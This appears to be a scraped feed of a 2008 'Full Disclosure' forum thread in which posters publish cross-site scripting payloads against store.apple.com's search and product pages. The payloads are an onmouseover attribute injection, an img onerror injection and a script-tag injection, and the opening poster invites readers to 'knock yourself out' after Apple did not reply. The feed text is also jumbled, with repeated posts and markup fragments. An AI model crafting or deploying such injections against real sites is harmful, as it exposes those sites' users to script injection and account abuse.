store.apple.com xss I emailed apple twice about an issue on the apple store search. They did not fix it for over a MONTH and never mailed me back either. They "fixed" it now, but they did a lousy job at it. httx://store.apple.com/us/search?find="+onmouseover="alert(1)" this will not work if you urlencode the " anyway, originally it would allow anything, now it strips tags but it will allows attribute based exploits, so knock yourself out. The reason I'm disclosing this now is because I really can't be bothered to run after apple, if they refuse to reply in a bearable time span or follow my advice. http://sla.ckers.org/forum/read.php?3,23576,23576#msg-23576 Sun, 19 May 2013 18:02:45 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?3,23576,25748#msg-25748 Re: store.apple.com xss http://sla.ckers.org/forum/read.php?3,23576,25748#msg-25748
-Dan]]> DoctorDan Full Disclosure Thu, 25 Dec 2008 22:34:57 -0600 http://sla.ckers.org/forum/read.php?3,23576,25734#msg-25734 Re: store.apple.com xss http://sla.ckers.org/forum/read.php?3,23576,25734#msg-25734 Both patched, check this out...

http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'"><script>alert("The apple didn't fell far from the last apple")</script><div id="]]> TheInsider Full Disclosure Wed, 24 Dec 2008 20:16:49 -0600 http://sla.ckers.org/forum/read.php?3,23576,23832#msg-23832 Re: store.apple.com xss http://sla.ckers.org/forum/read.php?3,23576,23832#msg-23832 Kyo Full Disclosure Mon, 04 Aug 2008 20:27:43 -0500 http://sla.ckers.org/forum/read.php?3,23576,23824#msg-23824 Re: store.apple.com xss http://sla.ckers.org/forum/read.php?3,23576,23824#msg-23824 http://store.apple.com/us/search?find=%22%3E%3Cimg%20src=%22.%22%20onerror=%22alert(1)%22%3Cinput
without onmouseover ^^
works in Firefox 2]]> Jiu Full Disclosure Mon, 04 Aug 2008 16:20:21 -0500 http://sla.ckers.org/forum/read.php?3,23576,23813#msg-23813 Re: store.apple.com xss http://sla.ckers.org/forum/read.php?3,23576,23813#msg-23813 rsnake Full Disclosure Sun, 03 Aug 2008 22:21:04 -0500 http://sla.ckers.org/forum/read.php?3,23576,23578#msg-23578 Re: store.apple.com xss http://sla.ckers.org/forum/read.php?3,23576,23578#msg-23578 thrill Full Disclosure Fri, 18 Jul 2008 15:28:38 -0500 http://sla.ckers.org/forum/read.php?3,23576,23576#msg-23576 store.apple.com xss http://sla.ckers.org/forum/read.php?3,23576,23576#msg-23576
httx://store.apple.com/us/search?find="+onmouseover="alert(1)"

this will not work if you urlencode the "

anyway, originally it would allow anything, now it strips tags but it will allows attribute based exploits, so knock yourself out.

The reason I'm disclosing this now is because I really can't be bothered to run after apple, if they refuse to reply in a bearable time span or follow my advice.]]> Kyo Full Disclosure Fri, 18 Jul 2008 13:28:30 -0500